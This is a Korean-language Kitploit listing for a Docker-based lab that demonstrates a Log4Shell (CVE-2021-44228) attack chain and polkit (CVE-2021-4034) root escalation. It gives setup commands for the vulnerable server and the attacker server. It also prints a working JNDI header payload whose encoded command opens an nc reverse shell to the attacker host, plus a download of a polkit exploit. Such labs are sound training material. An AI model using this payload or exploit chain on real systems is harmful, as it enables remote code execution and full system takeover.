Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
log4j-polkit-poc — 취약한 환경으로, log4j CVE-2021-44228의 공격 체인을 시연하고 polkit 익스플로잇 CVE-2021-4034를 사용하여 root로 권한 상승하는 설정입니다. | Kitploit
도구/GitHubGitHub/0xalwayslucky/log4j-polkit-poc
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationRed TeamingLabs & Practice
GitHub0xalwayslucky/log4j-polkit-poc

log4j-polkit-poc

취약한 환경으로, log4j CVE-2021-44228의 공격 체인을 시연하고 polkit 익스플로잇 CVE-2021-4034를 사용하여 root로 권한 상승하는 설정입니다.

저장소 보기
124년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

log4j CVE-2021-44228 + polkit CVE-2021-4034

log4j 아파치 익스플로잇 및 polkit을 이용한 권한 상승을 위한 취약 인스턴스

  • 취약한 spring-boot-application.jar는 이 docker 이미지에서 추출되었습니다.
  • 악성 JNDI 서버는 여기에서 다운로드되었으며 이 문서에서 참조되었습니다.

PoC 동영상

PoC 동영상

취약 인스턴스 생성

log4j-polkit-vuln

아래 단계를 완료하면 취약 인스턴스가 실행되어 호스트 머신에 노출된 포트 80에서 연결을 수신합니다. log4j 익스플로잇의 취약 부분은 서버로 전송되는 X-Api-Version 헤더입니다.

Docker: log4j-polkit-vulnerable-server

취약 docker 이미지를 pull 및 실행하는 단계:

root@kitploit:~
docker pull 0xalwayslucky/log4j-polkit-vulnerable-server
docker run -p 80:8080 0xalwayslucky/log4j-polkit-vulnerable-server

log4j + polkit 취약 인스턴스를 수동으로 생성하는 단계:

참고: Dockerfile은 ubuntu 저장소에 특정 버전의 취약 애플리케이션이 존재해야 합니다. 이러한 버전이 업데이트되거나 제거되면 docker 이미지 빌드가 실패할 수 있습니다. 이를 해결하기 위해 이미지가 docker hub에 업로드되어 여기에 링크될 예정입니다.

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/log4j-polkit-vuln
docker build -t log4j-polkit-vulnerable-server .
docker run -p 80:8080 --hostname victim log4j-polkit-vulnerable-server

attackserver

이것은 공격자의 머신을 시뮬레이션합니다. 이 경우 (docker 컨테이너 간의 쉬운 통신을 위해) 동일한 네트워크 내에 존재하지만, 익스플로잇은 이 공격 서버가 어디에 있든 작동합니다 (유일한 조건은 피해자가 접근할 수 있어야 한다는 것입니다). 악성 JNDI 서버가 여기에서 호스팅되며 피해자 머신에서 임의의 명령을 실행하는 악성 클래스를 생성합니다.

시뮬레이션된 공격자 머신을 생성하는 단계:

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/attackserver
docker build -t attackserver .
docker run -it --hostname attackserver attackserver /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <ip> -p 8888 &  # docker 컨테이너 내에서

익스플로잇

poc-비디오의 명령어

참고: attackserver의 IP 주소는 다를 수 있습니다.

root@kitploit:~
# Log4j 익스플로잇
curl http://localhost -H 'X-Api-Version: ${jndi:ldap://172.17.0.3:1389/Basic/Command/Base64/bmMgMTcyLjE3LjAuMyA0NDQ0IC1lIC9iaW4vYmFzaA==}'

# Polkit 익스플로잇
wget https://raw.githubusercontent.com/afwu/CVE-2021-4035/main/cve-2021-4034-poc.c

도구 다운로드